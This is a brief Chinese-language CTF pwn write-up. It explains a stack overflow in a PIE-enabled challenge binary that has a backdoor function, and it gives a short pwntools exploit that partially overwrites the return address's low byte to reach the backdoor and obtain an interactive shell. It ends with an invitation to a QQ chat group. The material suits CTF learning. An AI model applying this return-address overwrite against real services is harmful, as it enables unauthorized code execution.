分析
程序开了PIE
程序有后门函数
在vul函数中存在栈流出
所以可以利用PIE特性 覆盖返回地址的底一个字节为后门函数的底一字节
EXP:
from pwn import *
p=remote('x',0)
backdoor=0x27
payload=b'a'*88+p8(backdoor)
p.send(payload)
p.interactive()
结语:
本人是菜鸟,想找对CTF感兴趣的CTFer,一起交流学习,共同进步,迈向星辰大海!!!!^_^(有兴趣的加扣群:470196890)